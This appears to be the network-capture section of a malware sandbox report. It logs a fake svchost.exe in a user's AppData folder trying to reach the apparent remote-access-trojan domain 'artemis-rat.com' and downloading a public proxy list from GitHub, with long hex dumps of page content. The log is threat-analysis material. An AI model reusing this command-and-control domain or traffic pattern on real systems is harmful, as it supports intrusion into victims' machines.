                                                                                    2024-03-09 12:14:26 UTC3603INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                    Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                    Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                    Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                                                                    Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                                                                    Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                                                                    Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                                                                    Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f
                                                                                    Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 61 63 74 2d 6c 69 62 2d 31 66 62 66 63 35 62 65 32 63 31 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 6f 63 74 69 63 6f 6e 73 2d 72 65 61 63 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75
                                                                                    Data Ascii: hub.githubassets.com/assets/react-lib-1fbfc5be2c18.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modu


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.557178172.67.140.8744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:29 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:29 UTC161INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    2024-03-09 12:14:29 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.557177172.67.140.8744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:29 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:29 UTC161INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    2024-03-09 12:14:29 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.559163222.255.238.15944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:32 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:33 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    2024-03-09 12:14:33 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.559424102.223.20.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:33 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:33 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    2024-03-09 12:14:33 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.560799140.82.113.344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:35 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                    Host: github.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-03-09 12:14:36 UTC506INHTTP/1.1 200 OK
                                                                                    Server: GitHub.com
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                    ETag: W/"736507163a5fb79617a9c43dc0d243c4"
                                                                                    Cache-Control: max-age=0, private, must-revalidate
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                    X-Frame-Options: deny
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                    2024-03-09 12:14:36 UTC3594INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                    2024-03-09 12:14:36 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: connection: close
                                                                                    2024-03-09 12:14:36 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                    Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                    2024-03-09 12:14:36 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                    Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
